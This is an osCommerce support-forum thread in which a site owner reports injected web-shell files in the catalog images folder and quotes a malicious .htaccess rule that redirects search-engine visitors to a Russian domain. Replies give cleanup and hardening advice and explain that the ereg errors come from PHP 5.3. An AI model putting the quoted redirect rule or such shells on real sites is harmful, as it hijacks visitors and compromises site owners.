Jump to content
  • Checkout
  • Login
  • Get in touch


The e-commerce.

System mails


Recommended Posts



I'm using oscommerce and after a server change, my mysql was updated. So i have a lot af ereg errors.

At this moment i get a lot of system email telling me there are errors, for example:



Bug http://www.MYWEBSITE.be/catalog/images/cantik.phpnnSpread Via : IP nnKernel Version : Linux MYHOSTING xls-domU #2 SMP Thu Nov 17 12:17:59 CET 2011 x86_64 x86_64 x86_64 GNU/LinuxnnSafe Mode : OFF





Boss, there was an injected target on www.MYWEBSITE.be/catalog/images/xcrew.php?act=img&img=back by


I'm going yo do a full reinstall because but that's for the near future so i need to disable the setting to mail me those errors.


How can i solve this?



Thanks in advance!

Link to comment
Share on other sites



There are .htaccess files that are created by the virus with the code:



<IfModule mod_rewrite.c>

RewriteEngine On

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)

RewriteRule ^(.*)$ http://2010reltime.ru/langoust?8 [R=301,L]



This will link every hyperlink in search engines like google, back to google. When i delete this file, it automatically comes back after a time.

Link to comment
Share on other sites

Well, you've definitely been hacked. There could be code hidden in various .php files that you will have to root out and disinfect. There could be "back door" files the hacker installed to let them back in. Did you ever bother to follow the instructions on upgrading your osC security? Getting rid of file_manager and define_language, renaming admin and putting it under password protection, etc.? You're going to have to go over your files with a fine-toothed comb and remove anything that doesn't belong. Also scan your PC for spyware (password sniffers, keystroke loggers) and change all your passwords (host access, admin account, FTP, maybe even database). Enable your PC's firewall. Make sure you have proper permissions on all directories (755) and files (644, except 444 for configure.php), except where osC complains that it can't write to a specific directory or file. On top of all this, it's always possible that your host is no good and they have serious security problems of their own. Let them know any time you have a security issue that you can't attribute to your code or your administration.


'ereg' errors have nothing to do with MySQL. They're a sign that your host updated to PHP 5.3, and that you're running osC 2.2.

Link to comment
Share on other sites

There is an addon that details the upgrade steps to php 5.3 on all the main standard oscommerce files. All you then have to do is to test the site and rectify any other deprecated function errors.


Link to comment
Share on other sites


This topic is now archived and is closed to further replies.

  • Create New...